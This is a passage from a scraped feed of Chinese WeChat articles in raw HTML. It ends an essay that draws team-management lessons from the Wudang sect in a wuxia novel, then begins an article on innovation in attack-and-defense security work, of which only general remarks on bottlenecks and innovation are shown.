0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">f)老六殷梨亭温柔多情，剑术最精</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">g)老七内外兼修刚柔井济，最难得的是他们之间的团结精诚。绕指柔剑</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-size: 14px;font-family: 微软雅黑;">2.因材施教</span></section><p style="margin-left: 42pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-size: 14px;font-family: 微软雅黑;">a)老五在书法有一定的天赋，张三丰在得到俞岱岩变残后结合丧乱帖所创的倚天屠龙书法功，传给了张翠山；</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;text-indent: -21pt;letter-spacing: 0.034em;">b)</span><span style="font-family: 微软雅黑;font-size: 14px;text-indent: -21pt;letter-spacing: 0.034em;">老六殷梨亭剑术天赋，武当的</span><span style="font-family: 微软雅黑;font-size: 14px;text-indent: -21pt;letter-spacing: 0.034em;">“神门十三剑”单独传给了他</span><span style="font-family: 微软雅黑;font-size: 14px;text-indent: -21pt;letter-spacing: 0.034em;">。</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-size: 14px;font-family: 微软雅黑;">c)技术传承固然重要，如果能充分结合团队内部的个人天赋，必然更能升维升华。</span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="0.555956678700361" style="width:553.739990234375px;height:307.94000244140625px;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=f440801e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtINV8F97wUxmkuXxiboJaY1nXglBvkmyKCkYWJkgkSBPcbIlNTrTd7hRnanibJgM9YiawzrfdPVy33uQ%2F640%3Fwx_fmt%3Dpng"/></span></section><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-size: 14px;font-family: 微软雅黑;">3.管理梯队</span></p><p style="margin-bottom: 8px;line-height: 2em;text-align: left;margin-left: 0px;margin-right: 0px;text-indent: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;text-align: left;text-indent: 21pt;letter-spacing: 0.034em;">大弟子宋远桥本身资质就很好、武功也高、管理能力也不错、比较服众；</span><span style="font-size: 14px;font-family: 微软雅黑;text-align: left;text-indent: 21pt;letter-spacing: 0.034em;">其他弟子和大弟子并没有大面积大幅度的弱势差异，比如老二俞莲舟的武功基本和老大宋远桥相差无几，老五文武全才也深得张三丰喜爱，不会因为哪个弟子出点问题就让师父很头疼，人才梯队还是可以补位的，革职了宋远桥，直接俞莲舟就能接手；再加上企业文化的道家指引、练武合作的团队粘性，武当内斗和内耗很低。（</span><span style="font-size: 14px;font-family: 微软雅黑;text-align: left;text-indent: 21pt;letter-spacing: 0.034em;font-style: italic;">技术团队也差不多</span><span style="font-size: 14px;font-family: 微软雅黑;text-align: left;text-indent: 21pt;letter-spacing: 0.034em;">）</span></p><p style="margin-bottom: 8px;line-height: 2em;text-align: left;margin-left: 0px;margin-right: 0px;text-indent: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;text-indent: 21pt;letter-spacing: 0.034em;"></span><span style="font-family: 微软雅黑;font-size: 14px;text-indent: 21pt;letter-spacing: 0.034em;">         </span></p><p style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">五、复利主义</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="568" valign="top" style="width: 426.1pt;border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;word-break: break-all;"><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-size: 14px;font-family: 微软雅黑;">#张翠山回武当，见到宋远桥衣袖上所显的深厚功力的心理活动</span></strong><span style="font-size: 14px;font-family: 微软雅黑;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;font-style: italic;">寻思：“我武当派内功越练到后来，进境越快。我在王盘山之时，与义兄（谢逊）内力相差极远，但到冰火岛分手，似已拉近了不少。当年义兄在洛阳想杀大师哥，那时大师哥自然抵挡不住。但义兄就算双眼不盲，此刻的武功却未必能胜过大师哥多少。再过十年，大师哥、二师哥或许便会在义兄之上了。”</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">                  <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-family: 微软雅黑;font-size: 14px;">#俞莲舟见殷梨亭与周芷若对战的心理活动</span></strong><span style="font-family: 微软雅黑;font-size: 14px;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-style: italic;font-size: 14px;">他见殷梨亭剑法吞吐开合、阴阳动静，实已得到了恩师张三丰平时所指点的绝诣，师弟一生中从未施展过如此高明的剑术，今日面临生死关头，已将剑法中的精要都尽量发挥了出来，武当派武功讲究愈战愈强，时刻拖得越久，越有不败之望</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">                  <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><strong><span style="font-family: 微软雅黑;font-size: 14px;">#俞莲舟对战周芷若，评价其武功不过尔尔（战绩输出）</span></strong><span style="font-family: 微软雅黑;font-size: 14px;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;"><span style="font-family: 微软雅黑;font-style: italic;">俞莲舟纵身而起，右手抓住了软鞭的鞭梢。周芷若裙底飞出一腿，正中俞莲舟腰胁。俞莲舟一直捉摸不定周芷若诡异的鞭法精要所在，待得见她抖鞭成圈，夺落殷梨亭手中长剑，登时心中雪亮：“</span><span style="font-family: 微软雅黑;color: rgb(255, 0, 0);font-style: italic;">原来她功力不过尔尔</span><span style="font-family: 微软雅黑;font-style: italic;">，这几下抖鞭成圈，比之我们的太极拳功夫可差得远了。”一抓住鞭梢，拚着腰间受她一腿，左手探出，正是一招“虎爪绝户手”，直插周芷若小腹。周芷若无可抵挡，心中如电光般闪过一个念头：“</span><span style="font-family: 微软雅黑;color: rgb(255, 0, 0);font-style: italic;">我今日死在俞二叔手里</span><span style="font-family: 微软雅黑;font-style: italic;">。”右手放脱鞭柄，五指向俞莲舟头顶插落，只盼和他斗个同归于尽。俞莲舟侧头欲避，不料腰间中腿后穴道被封，头颈僵硬，竟尔不能转动，左手却仍是运劲疾落。</span></span></section></td></tr></tbody></table><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;">1.坚持</span><span style="font-size: 14px;font-family: 微软雅黑;">（长期主义）</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;text-indent: 0em;letter-spacing: 0.034em;">    a)天赋的确很重要，但最后的成功，基本都是在有优势的方向上，长期坚持。</span><span style="font-family: 微软雅黑;font-size: 14px;text-indent: 0em;letter-spacing: 0.034em;">精准努力。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;text-indent: 0em;letter-spacing: 0.034em;">    b)流水不争先，争的是滔滔不绝。武当的武功越到后期越厉害。</span></section><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-size: 14px;font-family: 微软雅黑;">2.倚天后期俞莲舟跻身超一流水平</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-family: 微软雅黑;font-size: 14px;">a)少林屠狮大会，俞莲舟评价周芷若武功不过尔尔</span></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 2em;margin-bottom: 0px;"><span style="font-size: 14px;font-family: 微软雅黑;">b)而范遥需要张无忌指点才能知道破解之法</span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="0.5649819494584838" style="width:553.739990234375px;height:312.79998779296875px;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=10d2536c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtINV8F97wUxmkuXxiboJaY1n6kGH4BBSuGqZ8wHXWeHNdonEt6pKXibGKcSMy7OowT2DSYMIuM5dGWg%2F640%3Fwx_fmt%3Dpng"/></span></section><p style="margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">六、创新意识</span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">a)掌门人的专注，创作大师</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">i.真武七截阵（团队协作）</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">ii.纯阳无极功，轻功有梯云纵剑法有绕指柔剑神门十三剑。阵法有真武七截阵。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">iii.《丧乱帖》 ——反脆弱能力</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 84pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">1.张三丰在得知俞岱岩残废后，悲伤所创</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 84pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">2.谁都没办法保证一直没有问题，如果在问题的基础上还能继续最大化去创作，以及在危险中抓住机会，那绝对是王者技能</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">iv.张三丰的太极拳 太极剑</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">b)弟子的创新</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">i.俞莲舟 虎爪绝户手</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 42pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">c)武侠世界的武功和现实生活中的技术同出一辙，后期都要走到创新，毕竟场景有可能是变化的。技术也都需要推陈出新。学习模仿固然重要，创作更可贵。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">i.或是解决问题思路</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 63pt;text-indent: -21pt;line-height: 2em;"><span style="font-size: 14px;font-family: 微软雅黑;">ii.或是持续传承思路</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;"><img class="rich_pages wxw-img" data-ratio="0.6209386281588448" style="width:553.739990234375px;height:344.1400146484375px;" data-type="png" data-w="554" src="https://wechat2rss.xlab.app/img-proxy/?k=f6d2bf1a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtINV8F97wUxmkuXxiboJaY1n1Tic1DMBWFusDHdtSc66MLanL1yOOPdnYMrcGwIvLLJV23XogbKyGDA%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;"><br/></section><p style="margin-top: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;text-indent: -21pt;line-height: 2em;margin-bottom: 8px;"><span style="font-family: 微软雅黑;font-weight: bold;font-size: 18px;">七、奖惩</span></p><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">1. 他铁面如山，一掌拍死了宋青书，还严肃追究宋远桥的连带责任，免了他掌门位子，众人见了“无不凛然”。</span><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">老张是不搞下不为例，不搞带病提拔的。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">2. 绝</span><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">对不能因为宋青书在第三代弟子能力出类拔萃，而包庇。</span><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">甚至</span>罢<span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">掉宋远桥的掌门</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">3. 团队里面也是如此，不能因为部分员工有一些功劳甚至能力不错，就去姑息，时间长了，其他人就会觉得错误也没有惩罚，就会无底线的试探错误。</span><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;">团队得不到正向的发展。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="font-size: 10.5pt;text-indent: -21pt;letter-spacing: 0.034em;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="text-indent: -21pt;letter-spacing: 0.034em;"></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;margin-left: 21pt;line-height: 2em;text-indent: 0em;"><span style="text-indent: -21pt;letter-spacing: 0.034em;">4. 绝不养虎为患、同样也不能饮鸩止渴</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-size: 14px;"><span style="font-family: 微软雅黑;">说明:</span><span style="font-family: 微软雅黑;font-style: italic;">虽然武侠世界与我们现实有很大的差别，并且有时候觉得有些行为和结果有些反常理，其实都是一种场景。大多数场景，只是以我们度量衡在判断，例如金钱利益是现在一个重要度量衡，在武侠世界，武功也是一种度量衡，侠义是一种标准。事情还是那个事，只是认同逻辑发生变化了。（若干年后，后几代看待现代的价值观或许也有不同）</span></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><br/></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><em><span style="font-size: 14px;"><span style="font-family: 微软雅黑;font-style: italic;">仅供参考</span></span></em><em><span style="font-size: 14px;"><span style="font-family: 微软雅黑;font-style: italic;"></span></span></em><span style="font-size: 14px;"><span style="font-family: 微软雅黑;font-style: italic;"></span></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 微软雅黑;font-weight: normal;line-height: 2em;"><span style="font-family: 微软雅黑;font-size: 14px;">          <br/></span></section><section style="display: none;line-height: 2em;"><br/></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483977">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=feab4c37&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483977%26idx%3D1%26sn%3D2c9039c83ab3ae59cba2c80a6d3f263c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 23 Jul 2023 23:44:00 +0800</pubDate>
    </item>
    <item>
      <title>攻防技术创新探究</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483964&amp;idx=1&amp;sn=1f06aa888edef255ab96fcea7b461882</link>
      <description>1月7日 在ADconf分享了 攻防创新相关的议题</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2023-01-10 07:40</span> <span style="display: inline-block;">北京</span>
</p>

<p>1月7日 在ADconf分享了 攻防创新相关的议题</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=47385359&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe80xxib3X7icreztJCc4xxoRtryZMTxKCs9ibgnibwRtcyZsK3CeXuJlYw6A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 16pt;font-family: &#34;等线 Light&#34;;font-weight: bold;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><strong><span style="font-family: 等线;font-weight: 400;text-align: justify;text-indent: 0pt;font-size: 24px;">一、写在前面</span></strong><span style="font-family: 等线;font-weight: 400;text-align: justify;text-indent: 0pt;font-size: 24px;"></span><span style="font-family: 等线;font-weight: 400;text-align: justify;text-indent: 0pt;font-size: 24px;"></span><br/></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;">1月7日 在</span><span style="font-family: 等线;font-size: 18px;">A</span><span style="font-family: 等线;font-size: 18px;">D</span><span style="font-family: 等线;font-size: 18px;">conf</span><span style="font-size: 18px;font-family: 等线;">分享了 《攻防技术创新探究》。在公众号归档下。</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;">总体分析和归纳不一定准确，欢迎各位大佬指正。</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:414.99997pt;height:264.5pt;"><imagedata title="image1"></imagedata></shape><img class="rich_pages wxw-img" data-ratio="0.6383363471971067" style="width:553.3400268554688px;height:352.6700134277344px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=9a21bf68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe8jNyutNfQsIib11PUicFvvrr2jQXjzNWS8hV7IJQXZBIpe1ib5xkJPySyA%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><a href="https://mp.weixin.qq.com/s?__biz=MzkxNTEzMTA0Mw==&amp;mid=2247491431&amp;idx=1&amp;sn=0900099e014bd6998e17e392c8ad5e57&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">官微链接</span></a></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><br/></span></p><h1 style="text-align: justify;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 等线;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><strong><span style="font-family: 等线;font-size: 24px;">二、为什么讲创新</span></strong><span style="font-family: 等线;font-size: 24px;"></span></h1><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;">在技术发展的过程中，总会遇到极限出现的那一刻。一项技术在遭遇极限后只能就此停步。令人沮丧的是，极限点是不可避免的。</span></p><p style="text-align: right;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;text-indent: 21pt;">——《技术的本质》</span></p><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;font-weight: bold;text-indent: 21pt;">发展瓶颈点分析：</span><br/></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: -21pt;">个人瓶颈：</span><span style="font-size: 18px;text-indent: -21pt;">技术瓶颈点、发展瓶颈点、高阶技术升华</span></p></li><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: 0em;">团队瓶颈：</span><span style="font-size: 18px;text-indent: 0em;">赛道的选择、输出价值、技术认可</span></p></li><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: 0em;">公司瓶颈：</span><span style="font-size: 18px;text-indent: 0em;">客户需求、商业价值、拔高能力</span></p></li></ul><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;font-weight: bold;text-indent: 21pt;">创新的意义：</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: -21pt;">解决瓶颈；</span></p></li><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: -21pt;">实现价值&amp;创造新价值</span></p></li></ul><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">关于创新三大误解：</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: 2em;">创新就</span><span style="font-size: 18px;text-indent: 2em;">是发明创造；</span></p></li><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: 2em;">创新是天才们的事情；</span></p></li><li><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;text-indent: 0em;line-height: 2em;"><span style="font-size: 18px;text-indent: 2em;">创新是灵光一现，孤立的，很难被学习和复制。</span></p></li></ul><p style="margin-left: 42pt;margin-top: 0px;margin-bottom: 0px;text-indent: 2em;line-height: 2em;"><span style="font-size: 18px;"><span style="font-family: 等线;"></span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-align: center;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><img class="rich_pages wxw-img" data-ratio="0.49606299212598426" style="width:508.010009765625px;height:252.0px;" data-type="png" data-w="508" src="https://wechat2rss.xlab.app/img-proxy/?k=128897aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe8jzCsFY1De11TEZQdsaP6v6ovU3SsmmDJJ43vd4mDLftrLXibh1aibUHw%2F640%3Fwx_fmt%3Dpng"/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: 